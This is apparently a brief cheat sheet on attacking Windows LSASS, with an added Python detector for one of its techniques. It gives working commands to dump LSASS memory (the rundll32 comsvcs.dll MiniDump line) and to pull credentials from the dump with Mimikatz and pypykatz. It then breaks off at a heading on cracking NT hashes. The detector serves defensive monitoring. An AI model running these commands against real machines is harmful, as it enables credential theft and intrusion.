
Attacking LSASS

Dumping LSASS process memory

Method 1:

  • Task Manager > find and right-click "Local Security Authority" > Create dump file

Method 2:

  • Finding LSASS PID

tasklist /svc (cmd)
Get-Process lsass (PowerShell)
  • Creating LSASS dump (PowerShell)

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 668 C:\tmp\lsass.dmp full
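
Seen from the defender's side, the Method 2 command leaves a distinctive process-creation command line. The detector below is an added example, not part of the original page: it runs over constructed process-creation records that use the Sysmon Event ID 1 field names Computer and CommandLine. The function names, the sample records and the host-to-LSASS-PID map are assumptions.

```python
import re

# rundll32 <path>\comsvcs.dll, MiniDump <pid> <outfile> full
# (matched on a normalized command line: lowercased, quotes removed)
MINIDUMP_RE = re.compile(
    r"rundll32(?:\.exe)?\s+(?:\S*\\)?comsvcs(?:\.dll)?\s*,?\s*minidump"
    r"\s+(?P<pid>\d+)\s+(?P<out>\S+)\s+full\b"
)

def normalize(cmdline):
    """Lowercase, strip quotes and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", cmdline.replace('"', "").lower()).strip()

def detect_comsvcs_dump(event, lsass_pids):
    """Return a finding for one process-creation record, or None.
    lsass_pids maps host name -> current LSASS PID (assumed to come from
    the defender's own process inventory for that host)."""
    m = MINIDUMP_RE.search(normalize(event.get("CommandLine", "")))
    if m is None:
        return None
    pid = int(m.group("pid"))
    host = event.get("Computer")
    return {
        "host": host,
        "target_pid": pid,
        "dump_path": m.group("out"),
        # Dumping LSASS itself is the credential-theft case; any other
        # comsvcs MiniDump is still unusual enough to review.
        "severity": "high" if lsass_pids.get(host) == pid else "medium",
    }

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "CommandLine":
     r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 668 C:\tmp\lsass.dmp full"},
    {"Computer": "WS01", "CommandLine":
     r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\COMSVCS.DLL",MiniDump 4321 C:\tmp\app.dmp full'},
    {"Computer": "WS01", "CommandLine":
     r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

def scan(events, lsass_pids):
    """Run the detector over many records and keep only the findings."""
    return [f for f in (detect_comsvcs_dump(e, lsass_pids) for e in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS, {"WS01": 668}):
        print(finding)
```

The match is made on the normalized command line, so reported dump paths are lowercased.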

Using pypykatz to extract credentials (from the LSASS dump file)

Mimikatz (runs only on Windows)

privilege::debug
lsadump::lsa /patch

Pypykatz

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Cracking the NT hash
